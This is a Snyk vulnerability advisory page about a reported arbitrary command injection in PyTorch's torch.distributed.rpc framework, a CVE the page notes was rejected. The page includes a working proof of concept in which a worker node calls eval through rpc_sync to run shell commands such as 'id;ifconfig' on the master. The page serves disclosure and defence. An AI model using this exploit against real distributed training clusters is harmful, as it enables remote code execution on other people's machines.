Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsLearn about Arbitrary Command Injection vulnerabilities in an interactive lesson.
Start learningThere is no fixed version for torch
.
This was deemed not a vulnerability.
torch is a Tensors and Dynamic neural networks in Python with strong GPU acceleration
Affected versions of this package are vulnerable to Arbitrary Command Injection through the torch.distributed.rpc
framework due to missing function validation during RPC calls. An attacker can execute arbitrary commands by leveraging built-in Python functions such as eval
during multi-CPU RPC communication.
Note: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.
Build master and worker nodes. Each node needs to set the following environment variables to ensure network communication between nodes.
export MASTER_ADDR=10.206.0.3
export MASTER_PORT=29500
export TP_SOCKET_IFNAME=eth0
export GLOO_SOCKET_IFNAME=eth0
On the master (10.206.0.3), enable the RPC service by calling the init_rpc
function. At this time, the master will listen to 0.0.0.0:MSTER_PORT
, which is used to communicate with each node in the network.
import torch import torch.distributed.rpc as rpc
def add(a, b): return a + b
rpc.init_rpc("master", rank=0, world_size=2) rpc.shutdown()
On the worker, first, establish the rpc protocol with the master by calling init_rpc
. Then, it is possible to communicate with the master through rpc.rpc_sync
for RPC function invocations. Due to the lack of security filtering in torch.distributed.rpc
, workers can execute built-in Python functions like eval
on the master node through RPC, even though these functions are not intentionally provided by the developer. This leads to remote code execution on the master node, potentially causing it to be compromised.
import torch import torch.distributed.rpc as rpc
rpc.init_rpc("worker", rank=1, world_size=2) ret = rpc.rpc_sync("master", eval, args=('import("os").system("id;ifconfig")',)) print(ret) rpc.shutdown()
The following commands can be used to start the master and worker separately. Of course, python3 master.py and python3 worker.py could also be executed separately.
for master: torchrun --nproc_per_node=1 --nnodes=2 --node_rank=0 --master_addr=10.206.0.3 --master_port=29500 master.py
for worker: torchrun --nproc_per_node=1 --nnodes=2 --node_rank=1 --master_addr=10.206.0.3 --master_port=29500 worker.py
As a result, the worker exploited the vulnerability to call built-in Python functions like eval on the master and execute arbitrary commands such as os.system("id;ifconfig"). According to the test screenshot, the IP displayed after the command execution is 10.206.0.3, indicating that the command has been executed on the master.